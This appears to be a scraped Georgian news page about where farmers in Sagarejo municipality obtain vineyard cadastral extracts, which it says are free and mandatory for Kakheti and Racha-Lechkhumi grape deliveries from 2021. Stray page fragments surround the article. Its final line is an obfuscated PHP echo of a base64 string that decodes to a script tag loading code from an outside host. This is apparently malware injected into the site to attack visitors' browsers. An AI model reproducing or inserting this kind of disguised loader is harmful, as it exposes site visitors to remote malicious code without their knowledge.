celsiusi
ავერსი შნაიდერი
საგარეჯოს მუნიციპალიტეტში ვენახების საკადასტრო ამონაწერის მისაღებად, სარეგისტრაციო უბნები განთავსებულია ქალაქ საგარეჯოში და შემდეგ სოფლებში: კაკაბეთი, ბადიაური, ყანდაურა,  თოხლიაური და მანავი. საჭიროების შემთხვევაში სარეგისტრაციო უბნების ლოკაციები გაფართოვდება.
 
როგორც Business Time-ს ღვინის ეროვნული სააგენტოდან აცნობეს, ვენახების რეგისტრაცია და კადასტრის ამონაწერით მოსავლის ჩაბარება კახეთისა და რაჭა-ლეჩხუმის რეგიონების ყველა მევენახისთვის სავალდებულო გახდა.  2021 წლიდან, რთველის დროს, ვენახების საკადასტრო ამონაწერის გარეშე, მევენახე ღვინის საწარმოს ყურძენს ვერ ჩააბარებს.  
 
ვენახის საკადასტრო ამონაწერი ამ ეტაპისთვის 27.000-მდე მევენახე ფერმერმა მიიღო.
 
მევენახე სარეგისტრაციო უბნებზე წარადგენს მხოლოდ პირადობის მოწმობას, საკადასტრო ამონაწერის მიღება უფასოა. ვენახების რეგისტრაცია და საკადასტრო ამონაწერის აღება კახეთისა და რაჭა-ლეჩხუმის რეგიონში  ჯამში 100-მდე ლოკაციაზე მიმდინარეობს.
1155
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");